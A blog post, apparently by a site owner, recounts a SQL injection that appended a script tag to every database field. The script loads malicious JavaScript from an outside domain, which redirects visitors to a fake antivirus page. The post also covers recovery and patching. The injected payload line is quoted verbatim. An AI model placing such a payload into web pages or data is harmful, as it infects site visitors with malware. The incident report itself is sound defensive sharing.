We had an old website compromised by an SQL injection attack originating from IP address 96.9.149.82 (an address in the United states) - the attack appended every field of every table in the database with the text:

"></title><script src="http://lilupophilupop.com/sl.php"></script><!--

This means that any page which has a dynamically generated title tag would have installed the maicious code referenced in the script tag. The javascript code then has a redirect in it to hop to other russion based malware sites, which is turn sometimes redirect people to different malware hosting sites. In this case, it was a fake antivirus screen (how imaginative! - not)

There's more info on the attack here: http://blog.aegislab.com/index.php?op=ViewArticle&articleId=136&blogId=1 apparently quite a few people were targeted yesterday.

Fortunately, we managed to restore the database without loss of data, and using the IIS logs we identified the vulnerable script and fixed it (something that a previous developer a few years ago left unpatched). However, I would think that there are a lot of other people who have wasted a few valuable hours on this. Look for the domain 'lilupophilupop.com' in google and there are over a thousand results already, and the virus has only been active a few days.

This looks to be a reappearance of the Lizamoon malware which infected up to 1,000,000 websites last September (the actual number of infections is impossible to measure since many websites don't like to admit when they have been hacked in to).

** update 7/21/2011 **

Over the last few days, one of the most common search engine referrals for this site were for 'lilupophilupop.com' or related keywords. This means that the attack was more common than I thought. Hopefully the information here will give some people a clue about how to fix the issue, and how to prevent it from happening in the future, but if you need help with fixing your website, please drop me a message via my contact form.